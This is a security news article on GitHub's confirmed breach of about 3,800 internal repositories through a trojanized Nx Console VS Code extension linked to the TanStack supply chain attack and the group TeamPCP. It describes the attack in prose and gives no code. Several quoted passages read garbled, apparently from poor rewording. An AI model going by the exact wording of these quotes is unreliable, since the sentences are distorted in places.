GitHub’s internal repositories were breached with Malicious Nx Console VS Code Extension
GitHub on Wednesday officially confirmed that the breach of its internal repositories was the result of a compromised employee device that installed a poisoned version of the Nx Console Microsoft Visual Studio Code (VS Code) extension.
The development comes as the Nx team revealed that the extension, nrwl.angular-console, was breached after its developers’ systems were hacked following the recent TanStack supply chain attack. Other companies affected by the TanStack compromise include OpenAI, Mistral AI, and Grafana Labs.
“We have no evidence of an impact on customer information stored outside of GitHub’s internal repositories, such as our customers’ businesses, organizations, and repositories,” said Alexis Wales, GitHub’s Chief Information Security Officer, in a statement.
“Some of GitHub’s internal repositories contain information from customers, for example, quotes from support interactions. If any impact is detected, we will notify customers through established incident response and notification channels.”
The attack is said to have allowed the threat actor, a cybercriminal group known as TeamPCP, to extract around 3,800 repositories. GitHub said it took steps to contain the incident and moved around sensitive secrets, adding that it continues to monitor the situation for further work.
In a post on X, Jeff Cross, founder of Narwhal Technologies, the company behind nx.dev, said, “this incident shows that there needs to be some deep, very important changes in the way we and other maintainers need to think about getting developer tools and open source distribution.”
“We’re also starting discussions with other top open source maintainers about how we can work together on some of the deeper structural issues around software supply chain security. Many of the assumptions that the ecosystem has been operating under for years are no longer valid.”
In recent months, TeamPCP has quickly gained notoriety for large-scale software attacks, particularly going after widely used open source projects and security-dependent tools that developers rely on.
What is noteworthy here is that the trojanized version of the VS Code extension was live on the Visual Studio Marketplace for only 18 minutes (between 12:30 pm and 12:48 pm UTC on May 18, 2026). But this short window was enough for the attackers to distribute a hack capable of harvesting sensitive data from 1Password vaults, Anthropic Claude Code configuration, npm, GitHub, and Amazon Web Services (AWS).
“The extension looked and behaved like a normal Nx Console, but initially it used a silent shell command that downloaded and executed a hidden package from a commit posted on the official nrwl/nx GitHub site,” said OX Security researcher Nir Zadok. “This order was intended as a routine exercise to stop the MCP from being suspicious.”
The interconnected nature of modern software has allowed TeamPCP to roll out a self-sustaining cycle of new compromises. The pattern driving this feature is as deceptively simple as it is insulting: hack one trusted tool, steal information from a developer’s systems that might install it, and use those credentials to break into the next legitimate tool.
“All the popular extended markets go with automatic automatic updates. VS Code, Cursor, the whole system,” says Aikido security researcher Raphael Silva. “The thinking makes sense on your own, because most developers don’t update anything manually, so giving it up means a long tail of programmers using old, vulnerable code.”
“Exchanges stop making sense when you account for hostile/vulnerable publishers. Automatic updates give the attacker who controls the release a direct push to every machine that uses that extension. Markets do not set any update gate or waiting period between the time the update is published and when the installed clients pull it.”
